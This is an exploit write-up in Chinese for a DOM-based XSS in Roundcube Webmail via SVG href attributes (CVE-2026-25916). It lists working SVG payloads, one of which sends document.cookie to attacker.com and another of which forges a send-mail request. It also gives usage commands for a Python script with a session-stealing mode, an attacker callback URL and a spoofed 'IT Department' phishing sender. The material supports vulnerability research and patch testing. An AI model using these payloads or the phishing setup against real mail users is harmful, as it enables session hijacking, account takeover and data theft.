
Python 漏洞利用程序,针对 Roundcube Webmail 中基于 DOM 的 XSS(CVE-2026-25916),通过 SVG href 属性实现会话劫持,并借助精心构造的电子邮件进行数据窃取。
漏洞利用标题: Roundcube Webmail 通过 SVG href 实现 DOM XSS(CVE-2026-25916)
作者: Mohammed Idrees Banyamer
联系方式: GitHub @mbanyamer | Instagram @banyamer_security
国家: 约旦
日期: 2026年2月9日
CVE: CVE-2026-25916
类型: 基于 DOM 的跨站脚本攻击(XSS)
平台: Web 应用程序
测试环境: Roundcube 1.6.8,Ubuntu 22.04
CVSS 评分: 6.1(中危)
⚠️ 警告: 此漏洞利用仅用于教育和授权测试目的。
仅可在您拥有或已获得明确书面许可的系统上使用。
作者对任何滥用或非法行为不承担任何责任。
Roundcube Webmail 1.6.9 之前的版本在 SVG 处理中存在基于 DOM 的 XSS 漏洞。该应用程序未能正确清理 SVG 元素中的 href 和 xlink:href 属性,从而允许通过特制电子邮件执行 JavaScript。
受影响版本: Roundcube Webmail < 1.6.9
修复版本: 1.6.9(提交 26d7677)
CWE: CWE-79 - 网页生成过程中输入的不当中和
攻击向量: 通过电子邮件远程攻击
影响: 会话劫持、账户接管、数据泄露
该漏洞存在于 rcube_washtml.php 中,其中 SVG 元素中的 href 属性未得到正确验证:
<!-- 易受攻击的 SVG 元素 -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"